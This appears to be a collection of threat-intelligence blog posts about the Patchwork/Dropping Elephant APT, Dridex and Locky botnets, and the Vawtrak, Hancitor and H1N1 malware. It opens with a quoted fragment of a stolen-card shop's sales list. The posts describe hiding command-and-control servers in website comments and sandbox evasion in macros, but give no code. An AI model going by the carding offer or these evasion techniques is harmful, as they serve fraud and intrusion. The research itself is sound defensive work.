? - Replace if the card balance is less than $1,000
? - Balance > 1,000 - 100,000 EUR/USD
? - Lowest prices at a stuff of such quality.
? - After purchase you will have 3 days to check
? - Refunds
? - Support 24/7


Not sure about doing business with these guys just yet, i'll consider my options.

Patchwork & The Dropping Elephant APT

Good work from Gadi and the team at Cymmetria & Kaspersky -  Cymmetria report is here , Kaspersky here 

What struck me as odd and reminded me of some of the work i looked at in May was this line in the Kaspersky analysis:

it hides base64 encoded and encrypted control server locations in comments on legitimate web sites. However, unlike the previous actors, the encrypted data provides information about the next hop, or the true C2 for the backdoor, instead of initial commands.

This particular comment struck me because in early may i was analysing some malicious .pps documents i had received and identified a number of CVE's being used in them, they contained material related to the Government projects and political interests in SE Asia.

Example metadata from .pps leveraging CVE's

I was struggling to identify what type of campaign this was, when i identified some of the C2 commands were being stored in blog comments on legitimate web sites although they were completely unrelated to any political activity.

There is a lot of security research available in the political unrest of SE Asia, South China Sea. A lot of the content available to research has been laid by FireEye  the ongoing territorial disputes are being fought with a very competitive cyber theme.

Welcome back #Dridex

My most recent blog indicated we would see the back of Dridex  & Locky, in hindsight it was a bit hopeful. P2P botnets Do not die the very principle they are built on offers a level of persistence that makes it near on possible to remove.

It has 'returned' - hat tip to @malwaretech who has significant fingers in pies with Necurs and can identify a lot of what Dridex is doing.  I'm time limited in terms of RE at the moment and the changes in Dridex has shown, thankfully they are being identified by Matt Mesa at Proofpoint

What i have identified as a result of some recent changes is the OS fingerprinting which is new( to me at least to me) Dridex is actively identifying the OS running on the host

So, the question to me , why is Dridex looking to fingerprint the OS? I observed some interesting checks in the macro too including the number of documents opened previously ( Attempted Sandbox evasion i assume) but this is easily bypassed.

Goodbye #Dridex, good riddance #Locky

The Past

We will no doubt shortly see some official word on the 'takedown' of Dridex and/or Locky, it has been widely reported that the lack of daily spam campaigns indicates its disappearance is linked to the FSB operation. Its widely known that the FSB only get involved in cyber criminal activity when there is significant international pressure to investigate. 

It's difficult not to draw logical conclusions on the timings of the two operations and subsequent disappearance of Dridex/Locky but its unlikely that Russia would be directly involved in a 'takedown' operation of a significant botnet which was responsible for the theft of money from banking institutions.

During the period from mid-2015 to the present day, 18 targeted attacks have been recorded across the country at bank customers’ automated workstations. The damage caused has exceeded 3 billion rubles. The police have prevented potential damage in the amount of 2 billion 273 million rubles.
— https://xn--80agyg.xn--b1aew.xn--p1ai/news/item/7894434/

FSB & MIA worked with Sberbank to conduct this operation and the reports from Russian intelligence indicate around  2.2 billion rubles where lost between October 2015 to March 2016 which ironically is the same time of the Smilex arrest who at the time was in Cyprus, originally from Moldova.

The Present

  • Vawtrak/Hancitor/H1N1
  • Vawtrak = Banking Trojan AKA Neverquest
  • Hancitor = Dropper, usually by a Macro 
  • H1N1 = Loader, with UAC bypass  (With some additional checks for GetCurrentProcess, and a nice crash) - Thanks to the genius' on KernelMode

Identifying Hancitor was done by post infection in my lab -  Thanks to Matt as ever.


Really great overview here from Proofpoint and a sample here